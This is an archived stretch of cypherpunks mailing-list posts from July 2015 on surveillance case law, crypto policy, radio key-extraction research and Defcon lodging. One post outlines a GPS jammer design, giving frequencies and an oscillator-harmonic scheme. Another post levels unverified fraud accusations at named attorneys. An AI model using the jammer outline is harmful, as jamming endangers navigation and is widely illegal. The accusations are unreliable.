Name: not available Type: text/html Size: 14600 bytes Desc: not available URL: From jya at pipeline.com Sun Jul 12 13:51:55 2015 From: jya at pipeline.com (John Young) Date: Sun, 12 Jul 2015 16:51:55 -0400 Subject: progression of technologies In-Reply-To: <506884227.816875.1436727195214.JavaMail.yahoo@mail.yahoo.c om> References: <506884227.816875.1436727195214.JavaMail.yahoo@mail.yahoo.com> Message-ID: Jim aptly notes the cheating use of technology and law, practiced by lawyers and technologists, prosecution and defense, hardly limited to millions of secretkeepers, litigous-technologicus ubquitious, so to paraphrase Dr. Geer, we are all corner cutting opportunists, highly trained and credentialed dual hatted techno-legalistic tricksters now. Once IANAL prevailed, now IAATLT. At 02:53 PM 7/12/2015, you wrote: >From: Tom Ritter >On 10 July 2015 at 10:58, <dan at geer.org> wrote: > >> Well, now we are into dueling Supreme Court cases; see > >> > >> > http://caselaw.findlaw.com/us-supreme-court/533/27.html > >> Kyllo v. United States (2001) > >> Despite the Court's attempt to draw a line that is "not only > >> firm but also bright," ante, at 12, the contours of its new rule > >> are uncertain because its protection apparently dissipates as > >> soon as the relevant technology is "in general public use," ante, > >> at 6-7. Yet how much use is general public use is not even hinted > >> at by the Court's opinion, which makes the somewhat doubtful > >> assumption that the thermal imager used in this case does not > >> satisfy that criterion. In any event, putting aside its lack > >> of clarity, this criterion is somewhat perverse because it seems > >> likely that the threat to privacy will grow, rather than recede, > >> as the use of intrusive equipment becomes more readily available. > > >Yes! That's the case I was obliquely referring to. Sorry, I kind of > >glazed over that part of your argument in the article. 
> > > That reads, to me, that what the public adopts limits what I can > > do or expect. > > >I guess where we quibble is I'm skeptical that the general public (as > >defined by the courts?) will (ever?) adopt the types of tools you > >refer to (uniquely identifying individuals based on electromagnetics, > >tracking tire pressure sensors.) I don't think the 'general public' > >has adopted thermal imagers. These will make their way into > >industry... (advertisers tracking WiFi probes in malls obviously). > >Months ago, FLIR announced an IR-imaging add-on for IPhones, which >is tiny. However, just a month or two ago I saw a media reference >to a (very tiny) T-shaped device, intended to plug into the >micro-USB jack of a cell phone, that did IR imaging. As I recall, >very economical, but even then the majority of the population won't >buy, simply because they have no need for such a thing most of the time. > > > > > > >So my wonder now is if industry adopting a technology is sufficient > >for the courts to qualify as 'general public'. But this, at best, only > >affects exotic technology. We're already fighting this battle. > > >Automated license plate readers have never (?) been challenged > >(successfully?). They are an extension of "a police officer just > >watching a highway" which is legal. And the courts like extensions of > >things that are already done - see bulk collection of metadata! > > >This 'extension' principle doesn't always work. In 2012, the >Supreme Court ruled (US v. Jones) >https://www.law.cornell.edu/wex/united_states_v._jones_%282012%29 >that police could not place a GPS tracking device on a car without a >warrant. One argument that has been rejected in lower-court cases >was the idea that in principle, a car's movements could be tracked >with an army of police, one per street corner, so that a GPS >tracking bug simply automated that process. 
One problem that >argument is that society not only doesn't have the resources to >accomplish such a blanket coverage of an area, and that even if >practical, society may not necessarily want such an intrusive system to exist. > >This issue was (secretly) quite relevant to me. Federal authorities >apparently installed a tracking device on a car I used, probably in >about April 2000, without a warrant. Presumably, if challenged they >would have been claiming to follow a 9th Circuit Court of Appeals >decision from 1999, U.S. v. McIver, which had allowed the placement >of a GPS tracking device on a truck seen at the location of a >marijuana growing operation. The problem with this justification, >however, is that at least in McIver, there was an actual crime >involved, and the truck was plausibly involved in that crime. In my >case, after my release from prison in April 2000, nobody alleged >that I was engaging in any crime. The McIver case didn't rule that >police could simply choose to place a GPS tracking device on ANY >car, for no reason, and even without 'probable cause' or 'reasonable >suspicion'. > >What was particularly devious (and I call illegal) was that later, >probably in October 2000, the Feds actually obtained a warrant for >the placement of ANOTHER tracking device on the same car (which, of >course, may have ended up being the same device!) WITHOUT telling >the judge that a tracking device was already on the car, and had >been so since at least as early as April 2000. Why the >subterfuge? They later used the result of the tracking device (at >least, the portion taken after the October warrant) against me in >court. But they continued to conceal the fact that a GPS device had >been placed since perhaps April 2000. Presumably, they concealed >that because they would have had to explain, in court, why they were >tracking me, without a warrant, and despite the fact that they had >no 'probable cause' nor 'reasonable suspicion' to do so. 
To conceal >that, they obtained the warrant, making it appear that the GPS >surveillance started in October 2000. This was fraud, because in >order to obtain a warrant, they have to explain WHY they need the >GPS device installed. Clearly, since a GPS device was already >installed in the car, there was no need to place one. THAT >misrepresented the need to the judge. > >You might ask, "Jim, why didn't you complain about this during the >trial". As you might know, I was given a long series of lawyers >who, rather than being the first line of defense for me, were >actually the first line of OFFENCE for the government. What the >average person doesn't understand is that a defense attorney, >colluding with the government, has virtually unlimited power to >sabotage his client's case, and that was precisely what happened to >me. The crooked attorney was Robert Leen. > >And it turned out that the government had a powerful motivation, or >at least some of its employees: They had faked an 'appeal' case in >the 9th Circuit, 99-30210, forging at least two filings as if I had >done them 'pro se', as if I was bringing that case. I did not, and I >wasn't aware of the pre-May 2000 existence of that faked case until >June 2003, when I first saw that case's docket. The crooked >attorney who concealed this from me was Jonathan Solovy. > Jim Bell From grarpamp at gmail.com Sun Jul 12 15:16:30 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 12 Jul 2015 18:16:30 -0400 Subject: FOIPA adventures In-Reply-To: References: Message-ID: On Sun, Jul 12, 2015 at 3:33 AM, coderman wrote: > ready to spend a fortune to see this through.
http://yro.slashdot.org/story/15/07/12/1449252/making-foia-requested-data-public-too-much-transparency-for-journalists > FOIA processing notes associated with requests #1331086-000, > #1331360-000, #1331082-000. Please include processing notes for this > request, even if request is denied in part. Please identify > individuals responsible for any aspect of FOIA processing in the > processing notes, along with explanation of their involvement if not > typically assigned FOIA responsibilities for the record systems above. lol. From grarpamp at gmail.com Sun Jul 12 15:23:27 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 12 Jul 2015 18:23:27 -0400 Subject: UK Snoopers Charter could ban End to End Crypto Message-ID: http://www.ibtimes.com.au/uks-snoopers-charter-ban-whatsapp-imessage-snapchat-1455452 WhatsApp is facing banning in the UK in the coming weeks. Prime Minister David Cameron is looking at a new legislation that could see the social media and online messaging services including Snapchat, Facebook Messenger and iMessage illegal in the country... From grarpamp at gmail.com Sun Jul 12 15:42:51 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 12 Jul 2015 18:42:51 -0400 Subject: Fwd: [Cryptography] Ad hoc "exceptional access" discussion at Crypto'15 ? In-Reply-To: <20150712151653.GH16799@yeono.kjorling.se> References: <55A1CEC6.2070404@m-o-o-t.org> <20150712151653.GH16799@yeono.kjorling.se> Message-ID: ---------- Forwarded message ---------- From: Michael Kjörling Date: Sun, Jul 12, 2015 at 11:16 AM Subject: Re: [Cryptography] Ad hoc "exceptional access" discussion at Crypto'15 ? To: cryptography at metzdowd.com On 11 Jul 2015 21:36 -0700, from hbaker1 at pipeline.com (Henry Baker): > "Exceptional access" is the term used in the recent MIT "Keys under > Doormats" report. One reason for a discussion session is to come up > with better arguments to explain to non-tekkies what the issues are, > and why the FBI should be careful what it wishes for. 
There's always the possibility of just asking said non-tekkies: - If the government can't keep their secrets safe (even ignoring various insider attacks like Manning or Snowden, let alone that which happens at the hands of disgruntled law enforcement officers or curious medical practitioners; see e.g. the recent US _Office of Personnel Management_ breach, or the illicit telephone wiretapping mess in Greece a few years ago which AFAIK hasn't ever been attributed to anyone), - If the companies that make software designed to allow spying on people can't maintain security (see e.g. the recent _Hacking Team_ episode), - If large multinational corporations can't maintain security (see e.g. the recent _Sony_ episode), - _Then why_ should we trust any of those to, in addition to their own secrets, keep _our_ secrets safe? Why should _I_ trust them to keep _my_ secrets safe? I obviously might not be able to do _better_ (and frankly, am unlikely to be able to do significantly better) than any of the above, but at least I'm not creating an _additional_ extreme-value-target treasure trove which I then fail to adequately protect. I sometimes compare data encryption to locking your house. (Most people accept that, even though they aren't doing anything illicit in their homes, they don't want strangers rummaging through their belongings.) In that comparison, "exceptional access" would be a sort of global master key that allows trivial unlocking of _any_ locked door, in such a way that does not trigger any alarm system or anything else similar that the home owner might have installed. 
-- Michael Kjörling • https://michael.kjorling.se • michael at kjorling.se OpenPGP B501AC6429EF4514 https://michael.kjorling.se/public-keys/pgp “People who think they know everything really annoy those of us who know we don’t.” (Bjarne Stroustrup) _______________________________________________ The cryptography mailing list cryptography at metzdowd.com http://www.metzdowd.com/mailman/listinfo/cryptography From jdb10987 at yahoo.com Sun Jul 12 11:53:15 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sun, 12 Jul 2015 18:53:15 +0000 (UTC) Subject: progression of technologies In-Reply-To: References: Message-ID: <506884227.816875.1436727195214.JavaMail.yahoo@mail.yahoo.com> From: Tom Ritter On 10 July 2015 at 10:58,  wrote: >> Well, now we are into dueling Supreme Court cases; see >> >> http://caselaw.findlaw.com/us-supreme-court/533/27.html >>    Kyllo v. United States (2001) >>    Despite the Court's attempt to draw a line that is "not only >>    firm but also bright," ante, at 12, the contours of its new rule >>    are uncertain because its protection apparently dissipates as >>    soon as the relevant technology is "in general public use," ante, >>    at 6-7. Yet how much use is general public use is not even hinted >>    at by the Court's opinion, which makes the somewhat doubtful >>    assumption that the thermal imager used in this case does not >>    satisfy that criterion. In any event, putting aside its lack >>    of clarity, this criterion is somewhat perverse because it seems >>    likely that the threat to privacy will grow, rather than recede, >>    as the use of intrusive equipment becomes more readily available. >Yes! That's the case I was obliquely referring to. Sorry, I kind of >glazed over that part of your argument in the article. > That reads, to me, that what the public adopts limits what I can > do or expect. >I guess where we quibble is I'm skeptical that the general public (as >defined by the courts?) will (ever?) 
adopt the types of tools you >refer to (uniquely identifying individuals based on electromagnetics, >tracking tire pressure sensors.)  I don't think the 'general public' >has adopted thermal imagers.  These will make their way into >industry... (advertisers tracking WiFi probes in malls obviously). Months ago, FLIR announced an IR-imaging add-on for IPhones, which is tiny.  However, just a month or two ago I saw a media reference to a (very tiny) T-shaped device, intended to plug into the micro-USB jack of a cell phone, that did IR imaging.  As I recall, very economical, but even then the majority of the population won't buy, simply because they have no need for such a thing most of the time. >So my wonder now is if industry adopting a technology is sufficient >for the courts to qualify as 'general public'. But this, at best, only >affects exotic technology.  We're already fighting this battle. >Automated license plate readers have never (?) been challenged >(successfully?). They are an extension of "a police officer just >watching a highway" which is legal.  And the courts like extensions of >things that are already done - see bulk collection of metadata! This 'extension' principle doesn't always work.  In 2012, the Supreme Court ruled (US v. Jones) https://www.law.cornell.edu/wex/united_states_v._jones_%282012%29  that police could not place a GPS tracking device on a car without a warrant.  One argument that has been rejected in lower-court cases was the idea that in principle, a car's movements could be tracked with an army of police, one per street corner, so that a GPS tracking bug simply automated that process.  One problem that argument is that society not only doesn't have the resources to accomplish such a blanket coverage of an area, and that even if practical, society may not necessarily want such an intrusive system to exist. This issue was (secretly) quite relevant to me.  
Federal authorities apparently installed a tracking device on a car I used, probably in about April 2000, without a warrant.  Presumably, if challenged they would have been claiming to follow a 9th Circuit Court of Appeals decision from 1999,  U.S. v. McIver, which had allowed the placement of a GPS tracking device on a truck seen at the location of a marijuana growing operation.  The problem with this justification, however, is that at least in McIver, there was an actual crime involved, and the truck was plausibly involved in that crime.  In my case, after my release from prison in April 2000, nobody alleged that I was engaging in any crime.  The McIver case didn't rule that police could simply choose to place a GPS tracking device on ANY car, for no reason, and even without 'probable cause' or 'reasonable suspicion'. What was particularly devious (and I call illegal) was that later, probably in October 2000, the Feds actually obtained a warrant for the placement of ANOTHER tracking device on the same car (which, of course, may have ended up being the same device!) WITHOUT telling the judge that a tracking device was already on the car, and had been so since at least as early as April 2000.  Why the subterfuge?  They later used the result of the tracking device (at least, the portion taken after the October warrant) against me in court.  But they continued to conceal the fact that a GPS device had been placed since perhaps April 2000.  Presumably, they concealed that because they would have had to explain, in court, why they were tracking me, without a warrant, and despite the fact that they had no 'probable cause' nor 'reasonable suspicion' to do so.  To conceal that, they obtained the warrant, making it appear that the GPS surveillance started in October 2000.  This was fraud, because in order to obtain a warrant, they have to explain WHY they need the GPS device installed.  
Clearly, since a GPS device was already installed in the car, there was no need to place one. THAT misrepresented the need to the judge. You might ask, "Jim, why didn't you complain about this during the trial". As you might know, I was given a long series of lawyers who, rather than being the first line of defense for me, were actually the first line of OFFENCE for the government. What the average person doesn't understand is that a defense attorney, colluding with the government, has virtually unlimited power to sabotage his client's case, and that was precisely what happened to me. The crooked attorney was Robert Leen. And it turned out that the government had a powerful motivation, or at least some of its employees: They had faked an 'appeal' case in the 9th Circuit, 99-30210, forging at least two filings as if I had done them 'pro se', as if I was bringing that case. I did not, and I wasn't aware of the pre-May 2000 existence of that faked case until June 2003, when I first saw that case's docket. The crooked attorney who concealed this from me was Jonathan Solovy. Jim Bell From jdb10987 at yahoo.com Sun Jul 12 14:53:05 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sun, 12 Jul 2015 21:53:05 +0000 (UTC) Subject: progression of technologies In-Reply-To: References: Message-ID: <321678489.847221.1436737985325.JavaMail.yahoo@mail.yahoo.com> From: "wirelesswarrior at Safe-mail.net" -------- Original Message -------- From: jim bell Apparently from: cypherpunks-bounces at cpunks.org To: Tom Ritter , "dan at geer.org" Cc: cpunks >It would seem that a GPS jammer keyfob, that could be turned off when desired, would do the trick. The GPS >signal at ground level is very weak and only works due to a huge process gain.
Narrowband jamming will >desensitize the closeby tracker's front end easily countering that process gain without jamming more distant >GPS receivers. Building such a jammer from cheap and available components should be easy. Yes, jamming ordinary (non-military) GPS would be easy. The two frequencies involved are: 1.57542 GHz (L1 signal) and 1.2276 GHz (L2 signal). (The former is the civilian signal; the latter is the military signal.) The system uses spread-spectrum techniques, but even these can be defeated readily with only very tiny amounts of power. The ERP (effective radiated power) of the L1 signal is about 250 watts (meaning that the signal is equivalent to an isotropic, or non-directional, radiator emitting 250 watts.) Due to the inverse-square law, the emissions at 20,200 km altitude are equivalent to a signal a trillion times (120 decibels) weaker at a distance of 20,200,000/1,000,000 or 20.2 meters away: A signal 250 watts/1 trillion is 0.25 nanowatts. I don't know offhand what the spread-spectrum advantage of the system is, but a nearby signal of 1 microwatt would probably obliterate any received signal. You will notice that the ratio of the two frequencies, L1 and L2, is very close (about 0.19% difference) to 9:7, being two odd numbers. This is quite convenient. What would be needed is a square wave oscillator at a frequency of 1.57542 GHz/9, or 175.04666 MHz. This signal, filtered to remove signal much below 1.2 GHz, will emit harmonics at both the L1 and L2 signals. It's not going to be an especially 'clean' jammer, having spurs also at the 3rd harmonic of 175.04666 MHz as well as the fifth harmonic, as well as the odd harmonics above the 9th. Making the 175 MHz squarewave would be a simple matter, using a PLL (Phase Lock Loop) frequency multiplier and a lower-frequency crystal. I think there are probably programmable-frequency oscillators on the market too, although I haven't looked into that in many years. Jim Bell, N7IJS.
"The LAST 'Tech-plus' ham in the world" From afalex169 at gmail.com Sun Jul 12 21:19:47 2015 From: afalex169 at gmail.com (Александр) Date: Mon, 13 Jul 2015 07:19:47 +0300 Subject: UK Snoopers Charter could ban End to End Crypto In-Reply-To: References: Message-ID: Oh, what a wonderful democracy we've got. This is madness! And if it won't happen in the coming weeks, it will eventually happen. Not only in the UK. Too much is at stake and nobody is going to move backwards. From grarpamp at gmail.com Mon Jul 13 08:14:40 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 13 Jul 2015 11:14:40 -0400 Subject: Stealing Keys from PCs using a Radio Message-ID: http://www.tau.ac.il/~tromer/radioexp/ We demonstrate the extraction of secret decryption keys from laptop computers, by nonintrusively measuring electromagnetic emanations for a few seconds from a distance of 50 cm. The attack can be executed using cheap and readily-available equipment: a consumer-grade radio receiver or a Software Defined Radio USB dongle. The setup is compact and can operate untethered; it can be easily concealed, e.g., inside pita bread. Perhaps someday extensible to coffeeshop pretext: "hey, can you help me test my bitcoin, let's swap a satoshi..."
From drwho at virtadpt.net Mon Jul 13 11:44:43 2015 From: drwho at virtadpt.net (The Doctor) Date: Mon, 13 Jul 2015 11:44:43 -0700 Subject: Executive Director Needed, Tor Project In-Reply-To: <90b7e493c2083965919e8fb549c3b016@cryptolab.net> References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> <90b7e493c2083965919e8fb549c3b016@cryptolab.net> Message-ID: <55A4071B.6040304@virtadpt.net> On 07/11/2015 06:44 PM, Griffin Boyce wrote: > Whoa whoa whoa. We all know that Vermin Supreme is the community > favorite to become the next Tor E.D. Juan's got no chance. You mean that Adam Weishaupt dropped out of the running? Shame, that. -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Disclaimer: Speaking only for myself and not my breakfast cereal. From griffin at cryptolab.net Mon Jul 13 12:13:24 2015 From: griffin at cryptolab.net (Griffin Boyce) Date: Mon, 13 Jul 2015 15:13:24 -0400 Subject: Executive Director Needed, Tor Project In-Reply-To: <55A4071B.6040304@virtadpt.net> References: <55A19D8A.6050300@riseup.net>
<55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> <90b7e493c2083965919e8fb549c3b016@cryptolab.net> <55A4071B.6040304@virtadpt.net> Message-ID: The Doctor wrote: > Griffin Boyce wrote: > >> Whoa whoa whoa. We all know that Vermin Supreme is the community >> favorite to become the next Tor E.D. Juan's got no chance. > > You mean that Adam Weishaupt dropped out of the running? Shame, that. ^ ▲ illuminati confirmed From grarpamp at gmail.com Mon Jul 13 14:35:54 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 13 Jul 2015 17:35:54 -0400 Subject: Defcon In-Reply-To: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> References: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Mon, Jul 13, 2015 at 5:20 PM, jim bell wrote: > Someone just reminded me that I have never attended Defcon, and one is > coming very soon. > it would help if I could stay with a small group that already had lodging and local transportation. Dude, will somebody please comp this guy :) From grarpamp at gmail.com Mon Jul 13 15:51:11 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 13 Jul 2015 18:51:11 -0400 Subject: Stop Selling Your Children To Bankers... Molyneux, Greece, Bitcoin... Message-ID: http://www.reddit.com/r/Bitcoin/comments/3d4dz1/the_eu_just_told_greece_give_us_50_billion_of/ http://www.reddit.com/r/Bitcoin/comments/3d4wed/stop_selling_your_children_to_bankers_stefan/ http://www.reddit.com/r/Bitcoin/comments/3d4gbu/no_we_dont_we_dont_owe_you_anything/ https://www.youtube.com/results?search_query=molyneux+bitcoin On hidden dangers of Bitcoin... "At some point there is going to be a conflict of biblical proportions..." 
-- Molyneux From jdb10987 at yahoo.com Mon Jul 13 12:36:48 2015 From: jdb10987 at yahoo.com (jim bell) Date: Mon, 13 Jul 2015 19:36:48 +0000 (UTC) Subject: Stealing Keys from PCs using a Radio In-Reply-To: References: Message-ID: <1156080481.1573635.1436816208329.JavaMail.yahoo@mail.yahoo.com> From: grarpamp Subject: Stealing Keys from PCs using a Radio Even in 1977, when I had just built my 'Dyna Micro' https://en.wikipedia.org/wiki/Single-board_computer microprocessor trainer board, I could tell that its emanations on the AM radio band were quite distinctive: I could monitor the progress of programs merely by listening to an otherwise-unoccupied AM frequency. While I wasn't particularly interested in the details at that time, it has long been obvious that a program could be written to emit specific data, perhaps by repeating segments of code based on the information to be transmitted. Jim Bell From alfonso.degregorio at gmail.com Mon Jul 13 14:02:16 2015 From: alfonso.degregorio at gmail.com (Alfonso De Gregorio) Date: Mon, 13 Jul 2015 21:02:16 +0000 Subject: Stealing Keys from PCs using a Radio In-Reply-To: <1156080481.1573635.1436816208329.JavaMail.yahoo@mail.yahoo.com> References: <1156080481.1573635.1436816208329.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Mon, Jul 13, 2015 at 7:36 PM, jim bell wrote: > From: grarpamp > > Subject: Stealing Keys from PCs using a Radio > > > Even in 1977, when I had just built my 'Dyna Micro' > https://en.wikipedia.org/wiki/Single-board_computer microprocessor trainer > board, I could tell that its emanations on the AM radio band were quite > distinctive: I could monitor the progress of programs merely by listening > to an otherwise-unoccupied AM frequency.
While I wasn't particularly > interested in the details at that time, it has long been obvious that a > program could be written to emit specific data, perhaps by repeating > segments of code based on the information to be transmitted. > Jim Bell > While I was not born yet back then, less than twenty years later I built such a program, playing with control messages sent from the host to the AT keyboard. Alfonso From jdb10987 at yahoo.com Mon Jul 13 14:20:30 2015 From: jdb10987 at yahoo.com (jim bell) Date: Mon, 13 Jul 2015 21:20:30 +0000 (UTC) Subject: Defcon Message-ID: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Someone just reminded me that I have never attended Defcon, and one is coming very soon. I'd go, if I could arrange to do so ECONOMICALLY. Already found some good deals on travel, but one person staying alone in Las Vegas isn't particularly cheap. My standards are very low, but it would help if I could stay with a small group that already had lodging and local transportation. I would contribute towards the cost. Jim Bell From list at sysfu.com Mon Jul 13 21:44:31 2015 From: list at sysfu.com (Seth) Date: Mon, 13 Jul 2015 21:44:31 -0700 Subject: Defcon In-Reply-To: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> References: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Mon, 13 Jul 2015 14:20:30 -0700, jim bell wrote: > Someone just reminded me that I have never attended Defcon, and one is > coming very soon. I'd go, if I could arrange to do so ECONOMICALLY. > Already found some good deals on travel, but one person staying alone > in Las Vegas isn't particularly cheap. My standards are very low, but > it would help if I could stay with a small group that already had > lodging and local transportation.
I would contribute towards the > cost. Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: lodging.jpg Type: image/jpeg Size: 74613 bytes Desc: not available URL: From grarpamp at gmail.com Mon Jul 13 19:07:57 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 13 Jul 2015 22:07:57 -0400 Subject: Encryption Rights - A Google+ community Message-ID: https://plus.google.com/communities/109624826715876091211 Encryption Rights - Protecting Our Rights to Strongly Encrypt By Lauren Weinstein http://www.vortex.com/lauren From jason.mcvetta at gmail.com Mon Jul 13 23:04:52 2015 From: jason.mcvetta at gmail.com (Jason McVetta) Date: Mon, 13 Jul 2015 23:04:52 -0700 Subject: Defcon In-Reply-To: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> References: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Message-ID: Rent a furnished tourist apartment a little off the Strip. Stay a week for the price of one day in a hotel. https://lasvegas.craigslist.org/search/apa?max_price=500&query=furnished&min_price=100 -- sent from my robot On Jul 14, 2015 4:25 AM, "jim bell" wrote: > Someone just reminded me that I have never attended Defcon, and one is > coming very soon. I'd go, if I could arrange to do so ECONOMICALLY. > Already found some good deals on travel, but one person staying alone in > Las Vegas isn't particularly cheap. My standards are very low, but it > would help if I could stay with a small group that already had lodging and > local transportation. I would contribute towards the cost. > Jim Bell
From shelley at misanthropia.org Tue Jul 14 02:45:39 2015 From: shelley at misanthropia.org (Shelley) Date: Tue, 14 Jul 2015 02:45:39 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: <20150714090319.GG6906@ctrlc.hu> References: <20150714090319.GG6906@ctrlc.hu> Message-ID: <20150714094523.637C2C00027@frontend1.nyi.internal> On July 14, 2015 2:11:35 AM stef wrote: > On Mon, Jul 13, 2015 at 10:07:57PM -0400, grarpamp wrote: > > https://plus.google.com/communities/109624826715876091211 > > Encryption Rights - Protecting Our Rights to Strongly Encrypt > > By Lauren Weinstein > > http://www.vortex.com/lauren > > but wtf in the middle of the kraakens tentacles? wth do people still trust > google? even laura. wtf? the mind boggles. > > -- I'm glad it's not just me! That was my reaction too but I held back from commenting, because I feel like I'm always bitching here about cpunks or anyone interested in privacy still using google for any reason. I don't understand it. -S From softservant at gmail.com Tue Jul 14 09:38:05 2015 From: softservant at gmail.com (Softy) Date: Tue, 14 Jul 2015 09:38:05 -0700 Subject: Re: Defcon Message-ID: and here I was not suggesting CouchSurfing.com because I thought that would be too obvious. This list is nothing but stating the obvious sometimes. Surprising how often that still presents a novelty view/info. > Rent a furnished tourist apartment a little off the Strip. Stay a week for > the price of one day in a hotel. > > > https://lasvegas.craigslist.org/search/apa?max_price=500&query=furnished&min_price=100 > > -- sent from my robot > On Jul 14, 2015 4:25 AM, "jim bell" wrote: > > > Someone just reminded me that I have never attended Defcon, and one is > > coming very soon. I'd go, if I could arrange to do so ECONOMICALLY.
> > Already found some good deals on travel, but one person staying alone in > > Las Vegas isn't particularly cheap. My standards are very low, but it > > would help if I could stay with a small group that already had lodging > and > > local transportation. I would contribute towards the cost. > > Jim Bell From shelley at misanthropia.org Tue Jul 14 09:58:30 2015 From: shelley at misanthropia.org (Shelley) Date: Tue, 14 Jul 2015 09:58:30 -0700 Subject: Re: Re: Defcon In-Reply-To: References: Message-ID: <20150714165814.17B44680232@frontend2.nyi.internal> On July 14, 2015 9:43:54 AM Softy wrote: > and here I was not suggesting CouchSurfing.com because I thought that > would be too obvious. This list is nothing but stating the obvious > sometimes. Surprising how often that still presents a novelty view/info. C'mon, I *know* one of you got the early convention rate and have an extra bed. I had to let mine go a month ago when I found out I couldn't go this year, or else I'd make the offer. Jim also is going to need a primer on going for the first time. We can't have him accidentally end up on the wall of sheep! -S > > Rent a furnished tourist apartment a little off the Strip. Stay a week for > > the price of one day in a hotel. > > > > > > > https://lasvegas.craigslist.org/search/apa?max_price=500&query=furnished&min_price=100 > > > > -- sent from my robot > > On Jul 14, 2015 4:25 AM, "jim bell" wrote: > > > > > Someone just reminded me that I have never attended Defcon, and one is > > > coming very soon. I'd go, if I could arrange to do so ECONOMICALLY. > > > Already found some good deals on travel, but one person staying alone in > > > Las Vegas isn't particularly cheap.
My standards are very low, but it > > > would help if I could stay with a small group that already had lodging > > and > > > local transportation. I would contribute towards the cost. > > > Jim Bell > > From sdw at lig.net Tue Jul 14 10:02:31 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 14 Jul 2015 10:02:31 -0700 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <55A540A7.6080808@lig.net> Everything will be run in the cloud and browser because it is, overall, a better computation model. However, that doesn't preclude you from running a cloud locally. Although pretty much proprietary to Google & Amazon until recently, Docker et al and related VM/container management APIs that are mappable to all kinds of implementations will allow apps, administration, networking, etc. to be fluid between commercial and various types of private clouds. In a lot of ways, this is an elegant solution and could arguably be much more secure than desktop apps in Windows. Assuming your container system isn't running in Windows, which is becoming an option; one that I won't trust easily. sdw On 7/14/15 8:52 AM, dan at geer.org wrote: > Discussing security policy post-OPM debacle in a setting to which > I have access (sorry to be oblique), it was said by a CxO "We have > to prepare for the day when no software we depend on is run on > premises." > > I did not handle this well (think sputtering as an alternative to > white rage). At the same time, I am probably in a bubble in that > I suspect that nearly everyone I see with a computer (of any form > factor) is already in that situation or, save for Javascript piped > in from the cloud to run locally, soon will be -- denizens of this > list and a few others excepted. > > Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, > perhaps, "Is anything to be done?" 
> > --dan From kurt.buff at gmail.com Tue Jul 14 10:09:42 2015 From: kurt.buff at gmail.com (Kurt Buff) Date: Tue, 14 Jul 2015 10:09:42 -0700 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: While I understand and share the sentiment, I'm beginning to wonder if it might make sense to simply ask "why?", and keep asking that until some straight answers emerge. Because, as mothers everywhere ask "if some of your friends jumped off a cliff, would that make it the right and smart thing to do, or merely the popular and stupid thing?" Kurt On Tue, Jul 14, 2015 at 8:52 AM, wrote: > Discussing security policy post-OPM debacle in a setting to which > I have access (sorry to be oblique), it was said by a CxO "We have > to prepare for the day when no software we depend on is run on > premises." > > I did not handle this well (think sputtering as an alternative to > white rage). At the same time, I am probably in a bubble in that > I suspect that nearly everyone I see with a computer (of any form > factor) is already in that situation or, save for Javascript piped > in from the cloud to run locally, soon will be -- denizens of this > list and a few others excepted. > > Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, > perhaps, "Is anything to be done?" > > --dan From kurt.buff at gmail.com Tue Jul 14 10:20:38 2015 From: kurt.buff at gmail.com (Kurt Buff) Date: Tue, 14 Jul 2015 10:20:38 -0700 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: On Tue, Jul 14, 2015 at 10:02 AM, Stephen D.
Williams wrote: > Everything will be run in the cloud and browser because it is, overall, a > better computation model. Certainly that's the current bias, but web browser as platform isn't really all that it's cracked up to be, IMHO - all browsers suck, and I don't see them getting better any time soon, especially if they run javascript and plugins. > However, that doesn't preclude you from running a > cloud locally. Certainly better than public/commercial clouds - at least until proven encryption becomes the norm. > Although pretty much proprietary to Google & Amazon until > recently, Docker et al and related VM/container management APIs that are > mappable to all kinds of implementations will allow apps, administration, > networking, etc. to be fluid between commercial and various types of private > clouds. > > In a lot of ways, this is an elegant solution and could arguably be much > more secure than desktop apps in Windows. Assuming your container system > isn't running in Windows, which is becoming an option; one that I won't > trust easily. Eh - good sysadmins with good managers/policies can secure Windows just fine, though I do like jails under FreeBSD... Kurt From s at ctrlc.hu Tue Jul 14 02:03:19 2015 From: s at ctrlc.hu (stef) Date: Tue, 14 Jul 2015 11:03:19 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: References: Message-ID: <20150714090319.GG6906@ctrlc.hu> On Mon, Jul 13, 2015 at 10:07:57PM -0400, grarpamp wrote: > https://plus.google.com/communities/109624826715876091211 > Encryption Rights - Protecting Our Rights to Strongly Encrypt > By Lauren Weinstein > http://www.vortex.com/lauren but wtf in the middle of the kraakens tentacles? wth do people still trust google? even laura. wtf? the mind boggles. 
